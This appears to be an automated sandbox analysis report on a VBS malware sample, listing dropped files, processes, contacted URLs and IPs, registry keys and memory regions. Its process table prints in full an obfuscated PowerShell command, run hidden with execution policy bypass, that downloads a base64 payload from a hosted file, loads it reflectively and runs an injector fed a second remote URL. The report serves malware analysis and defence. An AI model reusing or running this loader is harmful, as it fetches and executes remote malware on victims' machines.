Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
0BO4n723Q8.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4auhss11.0sz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gv3otye.c13.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bldp1xfe.1ea.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoywa02i.dtb.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t
'+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly
= [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod
= '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj
, Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39)
)"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://ia600100.us.arXr
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
http://107.172.148.248/130/RMOTH.txt
|
107.172.148.248
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.microsoft.c
|
unknown
|
||
|
http://107.172.148.248(
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://107.172.148.248
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtKqj;79dbase64Content
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
||
|
http://www.System.resources%20Time-Stamp%20PCA%202010(1).crl0l
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ia600100.us.archive.org
|
207.241.227.240
|
||
|
241.42.69.40.in-addr.arpa
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
107.172.148.248
|
unknown
|
United States
|
||
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1C465BDC000
|
trusted library allocation
|
page read and write
|
|
|
|
1C46DDF0000
|
trusted library section
|
page read and write
|
|
|
|
1F48D33A000
|
trusted library allocation
|
page read and write
|
||
|
1F48B525000
|
heap
|
page read and write
|
||
|
7FFE7DD60000
|
trusted library allocation
|
page read and write
|
||
|
23F11FE000
|
stack
|
page read and write
|
||
|
1C455500000
|
trusted library allocation
|
page read and write
|
||
|
2B2E6FE000
|
stack
|
page read and write
|
||
|
1C46D900000
|
heap
|
page read and write
|
||
|
11A9C706000
|
heap
|
page read and write
|
||
|
11A9C799000
|
heap
|
page read and write
|
||
|
1C4559E7000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE90000
|
trusted library allocation
|
page read and write
|
||
|
23F137E000
|
stack
|
page read and write
|
||
|
1C4537F8000
|
heap
|
page read and write
|
||
|
1C456CD0000
|
trusted library allocation
|
page read and write
|
||
|
11A9ADF8000
|
heap
|
page read and write
|
||
|
7FFE7DB90000
|
trusted library allocation
|
page read and write
|
||
|
11A9C790000
|
heap
|
page read and write
|
||
|
2B2E67D000
|
stack
|
page read and write
|
||
|
11A9C73F000
|
heap
|
page read and write
|
||
|
11A9C6E0000
|
heap
|
page read and write
|
||
|
1C46DB1E000
|
heap
|
page read and write
|
||
|
1F48B389000
|
heap
|
page read and write
|
||
|
11A9CC51000
|
heap
|
page read and write
|
||
|
2B2E9BC000
|
stack
|
page read and write
|
||
|
11A9C7AD000
|
heap
|
page read and write
|
||
|
7FFE7DBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE30000
|
trusted library allocation
|
page read and write
|
||
|
1C4658BC000
|
trusted library allocation
|
page read and write
|
||
|
1C46D76C000
|
heap
|
page read and write
|
||
|
11A9CC5B000
|
heap
|
page read and write
|
||
|
7FFE7DE20000
|
trusted library allocation
|
page read and write
|
||
|
10755FE000
|
stack
|
page read and write
|
||
|
23F173E000
|
stack
|
page read and write
|
||
|
23F13BF000
|
stack
|
page read and write
|
||
|
7FFE7DD70000
|
trusted library allocation
|
page read and write
|
||
|
1C456F80000
|
trusted library allocation
|
page read and write
|
||
|
23F107E000
|
stack
|
page read and write
|
||
|
1C4537B0000
|
heap
|
page read and write
|
||
|
11A9C6E5000
|
heap
|
page read and write
|
||
|
11A9CC43000
|
heap
|
page read and write
|
||
|
1F48B34B000
|
heap
|
page read and write
|
||
|
11A9C6E8000
|
heap
|
page read and write
|
||
|
1C455BDC000
|
trusted library allocation
|
page read and write
|
||
|
1C455A12000
|
trusted library allocation
|
page read and write
|
||
|
1F48D150000
|
heap
|
page read and write
|
||
|
7FFE7DE20000
|
trusted library allocation
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
11A9CC6E000
|
heap
|
page read and write
|
||
|
7FFE7DB64000
|
trusted library allocation
|
page read and write
|
||
|
11A9AD4C000
|
heap
|
page read and write
|
||
|
1F4A52D5000
|
heap
|
page read and write
|
||
|
11A9AD4B000
|
heap
|
page read and write
|
||
|
1C4538AA000
|
heap
|
page read and write
|
||
|
7FFE7DDE0000
|
trusted library allocation
|
page read and write
|
||
|
11A9CD48000
|
heap
|
page read and write
|
||
|
11A9C6E3000
|
heap
|
page read and write
|
||
|
11A9C7AE000
|
heap
|
page read and write
|
||
|
1F48D280000
|
heap
|
page execute and read and write
|
||
|
7FFE7DED0000
|
trusted library allocation
|
page read and write
|
||
|
1F48D110000
|
heap
|
page execute and read and write
|
||
|
11A9CC33000
|
heap
|
page read and write
|
||
|
1C4557E2000
|
trusted library allocation
|
page read and write
|
||
|
1F4A52D0000
|
heap
|
page read and write
|
||
|
11A9ADF8000
|
heap
|
page read and write
|
||
|
11A9C703000
|
heap
|
page read and write
|
||
|
7FFE7DB83000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A9CC29000
|
heap
|
page read and write
|
||
|
1C45383C000
|
heap
|
page read and write
|
||
|
11A9C870000
|
heap
|
page read and write
|
||
|
7FFE7DE70000
|
trusted library allocation
|
page read and write
|
||
|
2B2E7FE000
|
stack
|
page read and write
|
||
|
1C46D730000
|
heap
|
page read and write
|
||
|
1F48B480000
|
trusted library allocation
|
page read and write
|
||
|
1C455D2C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DEA0000
|
trusted library allocation
|
page read and write
|
||
|
1F48D117000
|
heap
|
page execute and read and write
|
||
|
1C455570000
|
trusted library allocation
|
page read and write
|
||
|
1C46DAEB000
|
heap
|
page read and write
|
||
|
11A9C6F2000
|
heap
|
page read and write
|
||
|
11A9CC4D000
|
heap
|
page read and write
|
||
|
1C46D857000
|
heap
|
page execute and read and write
|
||
|
1F48B2C0000
|
heap
|
page read and write
|
||
|
7FFE7DD40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C453810000
|
heap
|
page read and write
|
||
|
1C455BCB000
|
trusted library allocation
|
page read and write
|
||
|
11A9AD4D000
|
heap
|
page read and write
|
||
|
11A9CC51000
|
heap
|
page read and write
|
||
|
23F10FE000
|
stack
|
page read and write
|
||
|
7FFE7DC30000
|
trusted library allocation
|
page read and write
|
||
|
1F48D367000
|
trusted library allocation
|
page read and write
|
||
|
1F48B2A0000
|
heap
|
page read and write
|
||
|
7FFE7DEB0000
|
trusted library allocation
|
page read and write
|
||
|
11A9CC2A000
|
heap
|
page read and write
|
||
|
1F48D431000
|
trusted library allocation
|
page read and write
|
||
|
11A9C6EF000
|
heap
|
page read and write
|
||
|
11A9C6EA000
|
heap
|
page read and write
|
||
|
7FFE7DBDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7DC3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7DDA0000
|
trusted library allocation
|
page read and write
|
||
|
11A9C78B000
|
heap
|
page read and write
|
||
|
1C456EFA000
|
trusted library allocation
|
page read and write
|
||
|
1F49D343000
|
trusted library allocation
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
1F49D2D1000
|
trusted library allocation
|
page read and write
|
||
|
23F0D43000
|
stack
|
page read and write
|
||
|
1C46DA9C000
|
heap
|
page read and write
|
||
|
7FFE7DD20000
|
trusted library allocation
|
page read and write
|
||
|
1C453780000
|
heap
|
page read and write
|
||
|
1C455156000
|
heap
|
page read and write
|
||
|
7FFE7DE10000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD70000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A9C7AE000
|
heap
|
page read and write
|
||
|
1C46DAA6000
|
heap
|
page read and write
|
||
|
1C46D82A000
|
heap
|
page read and write
|
||
|
11A9AD4B000
|
heap
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
7FFE7DDE0000
|
trusted library allocation
|
page read and write
|
||
|
11A9C725000
|
heap
|
page read and write
|
||
|
7FFE7DE50000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DF23000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD90000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD11000
|
trusted library allocation
|
page read and write
|
||
|
2B2EC3E000
|
stack
|
page read and write
|
||
|
7FFE7DC36000
|
trusted library allocation
|
page read and write
|
||
|
11A9C71E000
|
heap
|
page read and write
|
||
|
1F48B3D3000
|
heap
|
page read and write
|
||
|
11A9C79B000
|
heap
|
page read and write
|
||
|
11A9CCC1000
|
heap
|
page read and write
|
||
|
7FFE7DDC0000
|
trusted library allocation
|
page read and write
|
||
|
1C4537FE000
|
heap
|
page read and write
|
||
|
2B2F68E000
|
stack
|
page read and write
|
||
|
1C456F25000
|
trusted library allocation
|
page read and write
|
||
|
11A9CC80000
|
heap
|
page read and write
|
||
|
7FFE7DB82000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DC66000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B2E878000
|
stack
|
page read and write
|
||
|
1F4A52DE000
|
heap
|
page read and write
|
||
|
1C4559A8000
|
trusted library allocation
|
page read and write
|
||
|
11A9C701000
|
heap
|
page read and write
|
||
|
1F4A5325000
|
heap
|
page read and write
|
||
|
11A9C7A4000
|
heap
|
page read and write
|
||
|
11A9CCC0000
|
heap
|
page read and write
|
||
|
7FFE7DF20000
|
trusted library allocation
|
page read and write
|
||
|
2B2E57E000
|
stack
|
page read and write
|
||
|
1F48B38E000
|
heap
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
1C46DA20000
|
heap
|
page execute and read and write
|
||
|
23F143F000
|
stack
|
page read and write
|
||
|
1F48D2D1000
|
trusted library allocation
|
page read and write
|
||
|
1F48D3E4000
|
trusted library allocation
|
page read and write
|
||
|
1C457201000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DEF0000
|
trusted library allocation
|
page read and write
|
||
|
1F48D8D6000
|
trusted library allocation
|
page read and write
|
||
|
1C46D73B000
|
heap
|
page read and write
|
||
|
11A9C770000
|
heap
|
page read and write
|
||
|
7FFE7DD31000
|
trusted library allocation
|
page read and write
|
||
|
11A9C6ED000
|
heap
|
page read and write
|
||
|
1C46DB1A000
|
heap
|
page read and write
|
||
|
11A9AD4D000
|
heap
|
page read and write
|
||
|
2B2E77E000
|
stack
|
page read and write
|
||
|
11A9CC4E000
|
heap
|
page read and write
|
||
|
7FFE7DB62000
|
trusted library allocation
|
page read and write
|
||
|
11A9CC43000
|
heap
|
page read and write
|
||
|
2B2ECBB000
|
stack
|
page read and write
|
||
|
11A9C794000
|
heap
|
page read and write
|
||
|
1F48B4B0000
|
heap
|
page read and write
|
||
|
7FFE7DD20000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A9ADF8000
|
heap
|
page read and write
|
||
|
11A9C6E2000
|
heap
|
page read and write
|
||
|
7FFE7DDD0000
|
trusted library allocation
|
page read and write
|
||
|
11A9C6E1000
|
heap
|
page read and write
|
||
|
1F4A52D8000
|
heap
|
page read and write
|
||
|
1F48B400000
|
heap
|
page read and write
|
||
|
7FFE7DE60000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DEE0000
|
trusted library allocation
|
page read and write
|
||
|
1C4559B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE80000
|
trusted library allocation
|
page read and write
|
||
|
10758FE000
|
stack
|
page read and write
|
||
|
1F4A5391000
|
heap
|
page read and write
|
||
|
2B2E4FD000
|
stack
|
page read and write
|
||
|
11A9CC33000
|
heap
|
page read and write
|
||
|
2B2EBBE000
|
stack
|
page read and write
|
||
|
1C4537B9000
|
heap
|
page read and write
|
||
|
1C46DA61000
|
heap
|
page read and write
|
||
|
7FFE7DB70000
|
trusted library allocation
|
page read and write
|
||
|
11A9CC82000
|
heap
|
page read and write
|
||
|
1C4537EF000
|
heap
|
page read and write
|
||
|
1C4554E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DDD0000
|
trusted library allocation
|
page read and write
|
||
|
11A9C703000
|
heap
|
page read and write
|
||
|
1F4A5830000
|
heap
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
1F49D2E0000
|
trusted library allocation
|
page read and write
|
||
|
1C4554C0000
|
trusted library allocation
|
page read and write
|
||
|
1C46D5C9000
|
heap
|
page read and write
|
||
|
11A9CC4A000
|
heap
|
page read and write
|
||
|
1C46DA7A000
|
heap
|
page read and write
|
||
|
1C455130000
|
heap
|
page read and write
|
||
|
11A9CC48000
|
heap
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
1C453790000
|
heap
|
page read and write
|
||
|
1C4559B2000
|
trusted library allocation
|
page read and write
|
||
|
1C4572C6000
|
trusted library allocation
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
1F48D3F2000
|
trusted library allocation
|
page read and write
|
||
|
1C4665DC000
|
trusted library allocation
|
page read and write
|
||
|
11A9C7AD000
|
heap
|
page read and write
|
||
|
11A9C747000
|
heap
|
page read and write
|
||
|
1C4554F0000
|
heap
|
page readonly
|
||
|
7DF4AABA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A9C6FA000
|
heap
|
page read and write
|
||
|
11A9CC6E000
|
heap
|
page read and write
|
||
|
11A9AF35000
|
heap
|
page read and write
|
||
|
1075BFE000
|
stack
|
page read and write
|
||
|
1F48B440000
|
trusted library allocation
|
page read and write
|
||
|
1C456CA8000
|
trusted library allocation
|
page read and write
|
||
|
1075DFB000
|
stack
|
page read and write
|
||
|
1F48D804000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE60000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DC80000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A9C703000
|
heap
|
page read and write
|
||
|
1F48B460000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DDB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7DC10000
|
trusted library allocation
|
page read and write
|
||
|
11A9C6F7000
|
heap
|
page read and write
|
||
|
7FFE7DE40000
|
trusted library allocation
|
page read and write
|
||
|
2B2EA3E000
|
stack
|
page read and write
|
||
|
7FFE7DE00000
|
trusted library allocation
|
page read and write
|
||
|
11A9C6E1000
|
heap
|
page read and write
|
||
|
1F48D3DE000
|
trusted library allocation
|
page read and write
|
||
|
1F48D688000
|
trusted library allocation
|
page read and write
|
||
|
1F48B1C0000
|
heap
|
page read and write
|
||
|
1C453785000
|
heap
|
page read and write
|
||
|
1F48B520000
|
heap
|
page read and write
|
||
|
7FFE7DEC0000
|
trusted library allocation
|
page read and write
|
||
|
1F4A53B0000
|
heap
|
page read and write
|
||
|
11A9C6E2000
|
heap
|
page read and write
|
||
|
2B2E473000
|
stack
|
page read and write
|
||
|
11A9C6E4000
|
heap
|
page read and write
|
||
|
1C453740000
|
heap
|
page read and write
|
||
|
1C46D75A000
|
heap
|
page read and write
|
||
|
11A9C788000
|
heap
|
page read and write
|
||
|
1F4A52D3000
|
heap
|
page read and write
|
||
|
1C46D850000
|
heap
|
page execute and read and write
|
||
|
11A9C75B000
|
heap
|
page read and write
|
||
|
7FFE7DC20000
|
trusted library allocation
|
page execute and read and write
|
||
|
10757FE000
|
stack
|
page read and write
|
||
|
11A9AB60000
|
heap
|
page read and write
|
||
|
1C46DAA0000
|
heap
|
page read and write
|
||
|
11A9C742000
|
heap
|
page read and write
|
||
|
11A9CC42000
|
heap
|
page read and write
|
||
|
1C46DCA0000
|
heap
|
page read and write
|
||
|
7FFE7DB80000
|
trusted library allocation
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
11A9C732000
|
heap
|
page read and write
|
||
|
11A9AD20000
|
heap
|
page read and write
|
||
|
11A9C72A000
|
heap
|
page read and write
|
||
|
7FFE7DD80000
|
trusted library allocation
|
page read and write
|
||
|
1C4572CA000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD1A000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD80000
|
trusted library allocation
|
page read and write
|
||
|
11A9C70D000
|
heap
|
page read and write
|
||
|
7FFE7DB7C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD30000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A9ADA3000
|
heap
|
page read and write
|
||
|
1075AFD000
|
stack
|
page read and write
|
||
|
7FFE7DDA0000
|
trusted library allocation
|
page read and write
|
||
|
1C4559EC000
|
trusted library allocation
|
page read and write
|
||
|
1C453836000
|
heap
|
page read and write
|
||
|
1C456CBF000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DB6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23F117D000
|
stack
|
page read and write
|
||
|
1C4655C1000
|
trusted library allocation
|
page read and write
|
||
|
11A9C7A0000
|
heap
|
page read and write
|
||
|
1C456CAC000
|
trusted library allocation
|
page read and write
|
||
|
11A9C6E4000
|
heap
|
page read and write
|
||
|
7FFE7DF19000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD14000
|
trusted library allocation
|
page read and write
|
||
|
1C456CF4000
|
trusted library allocation
|
page read and write
|
||
|
1C4658AF000
|
trusted library allocation
|
page read and write
|
||
|
11A9C7AE000
|
heap
|
page read and write
|
||
|
7FFE7DDF0000
|
trusted library allocation
|
page read and write
|
||
|
1C4559C4000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DC46000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A9C783000
|
heap
|
page read and write
|
||
|
11A9AC40000
|
heap
|
page read and write
|
||
|
1075CFE000
|
stack
|
page read and write
|
||
|
1C45378B000
|
heap
|
page read and write
|
||
|
1F48D42B000
|
trusted library allocation
|
page read and write
|
||
|
1F4A5388000
|
heap
|
page read and write
|
||
|
1C4555A0000
|
heap
|
page execute and read and write
|
||
|
7FFE7DB63000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7DF01000
|
trusted library allocation
|
page read and write
|
||
|
2B2EB3E000
|
stack
|
page read and write
|
||
|
1F49D31E000
|
trusted library allocation
|
page read and write
|
||
|
1C455BDE000
|
trusted library allocation
|
page read and write
|
||
|
11A9C6F5000
|
heap
|
page read and write
|
||
|
2B2E937000
|
stack
|
page read and write
|
||
|
11A9AF30000
|
heap
|
page read and write
|
||
|
1C4655D0000
|
trusted library allocation
|
page read and write
|
||
|
11A9CC59000
|
heap
|
page read and write
|
||
|
7FFE7DD02000
|
trusted library allocation
|
page read and write
|
||
|
1C4537FA000
|
heap
|
page read and write
|
||
|
1F48D3DB000
|
trusted library allocation
|
page read and write
|
||
|
1F48B3C9000
|
heap
|
page read and write
|
||
|
1F48B4B6000
|
heap
|
page read and write
|
||
|
11A9C764000
|
heap
|
page read and write
|
||
|
1F48B309000
|
heap
|
page read and write
|
||
|
7FFE7DE50000
|
trusted library allocation
|
page read and write
|
||
|
11A9C75C000
|
heap
|
page read and write
|
||
|
7FFE7DE80000
|
trusted library allocation
|
page read and write
|
||
|
1F48B341000
|
heap
|
page read and write
|
||
|
11A9AC60000
|
heap
|
page read and write
|
||
|
1C46D7E9000
|
heap
|
page read and write
|
||
|
1F48D3E1000
|
trusted library allocation
|
page read and write
|
||
|
11A9C75F000
|
heap
|
page read and write
|
||
|
1C455BC7000
|
trusted library allocation
|
page read and write
|
||
|
11A9C75F000
|
heap
|
page read and write
|
||
|
11A9CBC1000
|
heap
|
page read and write
|
||
|
7FFE7DD3A000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD42000
|
trusted library allocation
|
page read and write
|
||
|
1F4A54D0000
|
heap
|
page read and write
|
||
|
11A9CC6E000
|
heap
|
page read and write
|
||
|
107517A000
|
stack
|
page read and write
|
||
|
1F48D7C0000
|
trusted library allocation
|
page read and write
|
||
|
11A9C76B000
|
heap
|
page read and write
|
||
|
1C456CCC000
|
trusted library allocation
|
page read and write
|
||
|
1C46D7A3000
|
heap
|
page read and write
|
||
|
11A9CD49000
|
heap
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
11A9C72D000
|
heap
|
page read and write
|
||
|
7FFE7DE10000
|
trusted library allocation
|
page read and write
|
||
|
11A9C74F000
|
heap
|
page read and write
|
||
|
2B2F70D000
|
stack
|
page read and write
|
||
|
11A9C6EA000
|
heap
|
page read and write
|
||
|
7FFE7DDC0000
|
trusted library allocation
|
page read and write
|
||
|
11A9AD4A000
|
heap
|
page read and write
|
||
|
11A9ADF4000
|
heap
|
page read and write
|
||
|
7FFE7DE70000
|
trusted library allocation
|
page read and write
|
||
|
1C455D35000
|
trusted library allocation
|
page read and write
|
||
|
1C4537F2000
|
heap
|
page read and write
|
||
|
7FFE7DDB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DB8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A9C719000
|
heap
|
page read and write
|
||
|
7FFE7DC16000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DF14000
|
trusted library allocation
|
page read and write
|
||
|
1F48B361000
|
heap
|
page read and write
|
||
|
11A9CBC0000
|
heap
|
page read and write
|
||
|
11A9CC6E000
|
heap
|
page read and write
|
||
|
1C4555B0000
|
heap
|
page read and write
|
||
|
1C453750000
|
heap
|
page read and write
|
||
|
1F48D3EF000
|
trusted library allocation
|
